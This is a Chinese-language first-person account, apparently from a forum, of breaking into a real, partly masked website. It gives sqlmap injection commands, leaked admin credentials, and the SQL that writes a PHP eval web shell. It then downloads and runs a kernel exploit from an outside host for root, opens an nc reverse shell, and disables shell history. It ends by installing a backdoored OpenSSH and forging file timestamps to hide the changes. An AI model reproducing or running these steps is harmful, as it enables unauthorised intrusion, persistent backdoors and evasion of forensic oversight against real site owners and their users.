滲透某網(wǎng)站linu提權(quán)+ssh后門

滲透目標(biāo)真的網(wǎng)址我.pjxxxx服務(wù)器類型Target: .pjxxx/showpr?pid=7155HostIP: xxx.xx.xx.148WebServer: Apache/2.0.63(Unix)DAV/2PHP/5.2.13Powered-by: PHP/5.2.13DBServer: MySQL>=5CurrentDB: pjxx-----------------------------------------------------------------------------------------------------------------注入點(diǎn).pjxx/showpr?pid=7155爆出信息DataFound:adminname=liuxxxxxxDataFound:password=df7ca2a8exxxxxxLiuxxxxxxliuxxxxxDataFound:adminname=rootDataFound:password=66497fbbxxxxxxxxrootlxxxxxx這里信息我修改下。----------------------------------------------------------------------------------------------------------------------后臺(tái)地址：.pjxxx/admincp成功進(jìn)入后臺(tái)DataFound:adminname=liuxxxxxxDataFound:password=df7ca2a8e7xxxxxxliuxxxxx沒(méi)發(fā)現(xiàn)能利用的地方可能有的朋友想root都出來(lái)了怎么不去phpmyadmin呵呵第一次滲透的時(shí)候沒(méi)找到后臺(tái)總之這個(gè)站我看了好久…..繼續(xù)爆出網(wǎng)站路徑先留著后面用.pjxxx/admin/newsrequire_once(./include/common.inc)/home/pjxx/admin/news.pjxx/bbs/config.inc原來(lái)掃沒(méi)出來(lái)這次隨便一試出來(lái)了真是坑爹啊root去登錄賽…….pjxxx/phpadmin/好吧再次坑爹測(cè)試前面的兩個(gè)帳號(hào)都不能登錄我也忘了這是第幾天了…..Sqlmap注入測(cè)試這里我用他因?yàn)槲业奶}卜頭不好使查看數(shù)據(jù)庫(kù)sqlmap.py-u".pjxxx/showpr?pid=7155"--dbs-v看指定庫(kù)的表sqlmap.py-u".pjxxxx/showpr?pid=7155"–D庫(kù)名--tableDatabase:pjxx[168tables]+----------------------+|cdb_access||cdb_activities||cdb_activityapplies||cdb_adminactions||cdb_admincustom||cdb_admingroups||cdb_adminnotes||-------省略一些sqlmap.py-u".pjxx/showpr?pid=7155"–columns–T--+表沒(méi)加好.pj9xxnet/uc/admin?m=user&a=login&iframe=&sid=找不到密碼先放幾天……話說(shuō)這個(gè)站我看了好久…..不甘心就一直在搞中間我去請(qǐng)教大牛了嘎嘎最后突破口是sqlmap讀配置文件…..好吧我真不會(huì)這個(gè)….讀配置文件為了解密害我到2點(diǎn)才睡。小菜我不會(huì)啊。關(guān)電腦我想到win7下有個(gè)目錄的，先睡覺(jué)….第二天原來(lái)這么看…….我日……記事本打開登錄.pjxxx/phpadmin/用戶root密碼xxxxxxxxxx這樣就可以phpmyadmin寫一句話了不會(huì)的百度吧反正我是第一次我百度的網(wǎng)站絕對(duì)路徑/home/pjxx/這是n天前搞到的我是按照這個(gè)方法來(lái)弄的CreateTABLEa(cmdtextNOTNULL);InsertINTOa(cmd)VALUES('<?php@eval($_POST[cmd])?>');SELECT*FROM`a`WHERE1intooutfile'/home/pjxx/uploads/mao'菜刀接下來(lái)提權(quán)（第一次linux下提權(quán)）內(nèi)核版本什么我看過(guò)了不截圖了nc反彈下載expwgetgome.hk/attachment/mc/2.6.9chmod+x2.6.9./2.6.9溢出成功添加帳號(hào)放后門ssh不記錄操作exportHISTFILE=/dev/nullexportHISTSILZ建立mkdir目錄下載后門復(fù)制ssh文件mv/etc/ssh/sshd_config/etc/ssh/sshd_config.oldmv/etc/ssh/ssh_config/etc/ssh/ssh_config.old解壓sshbd.gztarzxvfsshbd*進(jìn)入openssh目錄然后lscatinclude.h不能看下面編譯./configure--prefix=/usr--sysconfdir=/etc/ssh編譯成功輸入make&&makeinstall成功還原sshtouch–r/etc/ssh/sshd_config.old/etc/ssh/sshd_configtouch–r/etc/ssh/ssh_config.old/etc/ssh/ssh_config至此完成累死我了